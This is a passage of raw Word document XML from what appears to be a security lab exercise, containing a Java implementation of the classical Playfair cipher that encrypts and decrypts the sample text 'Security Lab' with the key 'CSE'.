      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>"");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413A1136" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="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6BB329C5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="87"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53564CA6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="2222" w:hanging="279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createTbl(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>key,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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chgJtoI)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charTable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new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>char[5][5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C74D4E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="233"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>positions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Point[26];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED6A5F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="1222"/>
      </w:pPr>
      <w:r>
        <w:t>String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prepareText(key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"ABCDEFGHIJKLMNOPQRSTUVWXYZ",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chgJtoI); int len = s.length();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716B1D3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="239" w:lineRule="exact"/>
        <w:ind w:left="917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 =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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k =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>0; 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len;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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char </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB0DA66" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198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s.charAt(i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B74083" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C32CA09" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1478" w:right="6284" w:hanging="281"/>
      </w:pPr>
      <w:r>
        <w:t>if (positions[c - 'A'] == null) { charTable[k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5][k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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5]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9"/>
        </w:rPr>
        <w:t>c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DC36A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>positions[c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'A']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Point(k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 xml:space="preserve">5); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>k++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABE94FF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0C66CC2A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5EB30C59" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="243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15ED88CD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr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5EB7A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="3821" w:hanging="279"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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codec(StringBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>txt,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dir)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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len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txt.length();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C477A56" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="1198" w:right="5847" w:hanging="281"/>
        <w:jc w:val="both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len;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txt.charAt(i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D3F55" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="1198"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>char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txt.charAt(i +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14:paraId="2BE39717" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="1198" w:right="5883"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>int row1 = positions[a - 'A'].y; int row2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positions[b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'A'].y;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4"/>
        </w:rPr>
        <w:t>col1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552826D2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198" w:right="6218"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>positions[a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'A'].x;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col2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>= positions[b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'A'].x;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(row1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>== row2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00661B7D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1478"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>col1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(col1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dir)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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5;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>col2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68392BAD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1478"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(col2 +</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dir)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5"/>
        </w:rPr>
        <w:t>5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744D7E90" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="1198"/>
        <w:jc w:val="both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(col1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col2)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BFD460F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E758F15" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="1478" w:right="5720"/>
      </w:pPr>
      <w:r>
        <w:t>row1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(row1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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dir)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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5;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>row2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>= (row2 + dir) % 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFEE61B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
        <w:ind w:left="11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3CE6C9B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="1478" w:right="7261"/>
      </w:pPr>
      <w:r>
        <w:t>int tmp = col1; col1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col2;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>col2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11294523" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>tmp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E067C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075BBAC9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="1198" w:right="4861"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">txt.setCharAt(i, charTable[row1][col1]); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>txt.setCharAt(i + 1, charTable[row2][col2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65196EAF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="23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1BB81C39" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011F78B9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>txt.toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6705A8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1E50DD92" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="86"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F50D95C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="5229" w:hanging="279"/>
      </w:pPr>
      <w:r>
        <w:t>private static String encode(String s) { StringBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sb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StringBuilder(s);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>for (int i = 0; i &lt; sb.length(); i += 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF59CD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r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sb.length()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sb.append(sb.length()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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1114F896" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>==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'X'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"");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C914BF6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="1478" w:right="4861" w:hanging="281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(sb.charAt(i)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sb.charAt(i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1))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>{ sb.insert(i + 1, 'X');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C026C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5695ABFF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46F42968" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE55778" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>codec(sb,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C596485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4C72188F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="88"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50250269" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="5229" w:hanging="279"/>
      </w:pPr>
      <w:r>
        <w:t>private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decode(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>s)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return codec(new StringBuilder(s), 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DA5587" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="4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710FFEA5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr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A901A5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="267"/>
        <w:ind w:left="917" w:right="1849" w:hanging="279"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>throws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.Exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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"CSE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B0DA9A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="1143"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>txt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"Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Lab";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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J to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*/ boolean chgJtoI = true; createTbl(key,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BF209C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>chgJtoI);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D52D245" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="8490"/>
        </w:tabs>
        <w:ind w:left="917" w:right="1712"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485760512" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="534A23AA" wp14:editId="5E470B75">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2363977</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>283802</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3672204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2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2204">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3671961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DAEC" id="Graphic 151" o:spid="_x0000_s1026" style="position:absolute;margin-left:186.15pt;margin-top:22.35pt;width:289.15pt;height:.1pt;z-index:-175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A9FgIAAFsEAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0Xxx7RboacYqhQYcB&#10;RVegGXZWZDk2JosapcTOvx8lfyTrbsN8EJ5Einzko7y+71vNTgpdA6bg6WLJmTISysYcCv599/jh&#10;E2fOC1MKDUYV/Kwcv9+8f7fubK4yqEGXChkFMS7vbMFr722eJE7WqhVuAVYZMlaArfC0xUNSougo&#10;equTbLlcJR1gaRGkco5Ot4ORb2L8qlLSf6sqpzzTBSduPq4Y131Yk81a5AcUtm7kSEP8A4tWNIaS&#10;zqG2wgt2xOavUG0jERxUfiGhTaCqGqliDVRNunxTzWstrIq1UHOcndvk/l9Y+Xx6tS8YqDv7BPKn&#10;o44knXX5bAkbN/r0FbbBl4izPnbxPHdR9Z5JOvy4us2y5Q1nkmxpdhubnIh8uiuPzn9REOOI05Pz&#10;gwblhEQ9IdmbCSIpGTTUUUPPGWmInJGG+0FDK3y4F8gFyLoLkXDWwkntIFr9G+ZE7WLV5tqLSknv&#10;VilnU5XkO3gQCGmoVwOIqQlfF6dNYJGm2c0qzoYD3ZSPjdaBhsPD/kEjO4kwmfELhVCIP9wsOr8V&#10;rh78SkKjlzajToM0QaQ9lOcXZB1Nc8Hdr6NAxZn+amhcwuhPACewnwB6/QDxgcQGUcpd/0OgZSF7&#10;wT0p+wzTMIp8Ei2UPvuGmwY+Hz1UTVA0ztDAaNzQBMf6xtcWnsj1Pnpd/gmb3wAAAP//AwBQSwME&#10;FAAGAAgAAAAhAFfUpz/eAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG4s&#10;pes2WupO0xDihmDwAFnjtdEapzTZWnh6shMcbX/6/f3lerKdONPgjWOE+1kCgrh22nCD8PnxfPcA&#10;wgfFWnWOCeGbPKyr66tSFdqN/E7nXWhEDGFfKIQ2hL6Q0tctWeVnrieOt4MbrApxHBqpBzXGcNvJ&#10;NEmW0irD8UOretq2VB93J4vwlZnXtMl/TH44jovN9onfjH5BvL2ZNo8gAk3hD4aLflSHKjrt3Ym1&#10;Fx3CfJXOI4qQZSsQEcgXyRLE/rLIQVal/N+g+gUAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4A&#10;AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA&#10;IQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA&#10;IQBJD2A9FgIAAFsEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQBX1Kc/3gAAAAkBAAAPAAAAAAAAAAAAAAAAAHAEAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAAewUAAAAA&#10;" path="m,l3671961,e" filled="f" strokeweight=".31239mm">
                <v:stroke dashstyle="dash"/>
                <v:path arrowok="t"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>String enc = encode(prepareText(txt, chgJtoI)); System.out.println("Simulating Playfair Cipher\n</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D59737C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="2222"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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txt);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">System.out.println("Encrypted Message : " + enc); System.out.println("Decrypted Message : " + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>decode(enc));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB054C2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="4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46B061DB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77A6DE0E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="250"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A1B493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71993E0C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Simulating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Playfair</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE399D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7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68F6FCD" wp14:editId="27C105AF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>129763</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1304925" cy="127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925">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1304417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9CFB" id="Graphic 152" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:10.2pt;width:102.7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4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itFQIAAF4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6L46zdu2MOMXQoMOA&#10;oivQDDsrshwbk0WNVOLk70fJcZJ2t2E+CKT4RD3yUZ7f7TsrdgapBVfKfDKVwjgNVes2pfyxevhw&#10;KwUF5SplwZlSHgzJu8X7d/PeF2YGDdjKoOAkjorel7IJwRdZRroxnaIJeOM4WAN2KrCLm6xC1XP2&#10;zmaz6fRT1gNWHkEbIt5dDkG5SPnr2ujwva7JBGFLydxCWjGt67hmi7kqNqh80+ojDfUPLDrVOr70&#10;lGqpghJbbP9K1bUagaAOEw1dBnXdapNq4Gry6ZtqXhrlTaqFm0P+1Cb6f2n10+7FP2OkTv4R9C/i&#10;jmS9p+IUiQ4dMfsau4hl4mKfung4ddHsg9C8mX+cXn2eXUuhOZbPblKTM1WMZ/WWwlcDKY/aPVIY&#10;NKhGSzWjpfduNJGVjBrapGGQgjVEKVjD9aChVyGei+SiKfozkbjXwc6sIEXDG+ZM7Ry17hIVS7nK&#10;b6QYq2TsgGAjXsO9Gox0NduXxVk3sMivb9NsENi2emitjTQIN+t7i2Kn4mSmLxbCKV7BPFJYKmoG&#10;HB0oOkegdUepBnWiTmuoDs8oeh7oUtLvrUIjhf3meGLi9I8GjsZ6NDDYe0hvJPWIb13tfyr0IhIo&#10;ZWBxn2CcR1WMusXqT9h40sGXbYC6jaKmMRoYHR0e4lTi8cHFV3LpJ9T5t7D4AwAA//8DAFBLAwQU&#10;AAYACAAAACEA719Rtt0AAAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPzU7DMBCE70i8g7VIXBC1&#10;KaEqIU5VpULiSkCcN/HmR43XIXba8Pa4JzjO7Gj2m2y32EGcaPK9Yw0PKwWCuHam51bD58fr/RaE&#10;D8gGB8ek4Yc87PLrqwxT4878TqcytCKWsE9RQxfCmErp644s+pUbieOtcZPFEOXUSjPhOZbbQa6V&#10;2kiLPccPHY5UdFQfy9lqqLZfh6YtmuLtUOJx/z3PRtV3Wt/eLPsXEIGW8BeGC35EhzwyVW5m48UQ&#10;dZLELUHDWiUgYuAxeX4CUV2MDcg8k/8X5L8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA&#10;4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEA&#10;OP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUA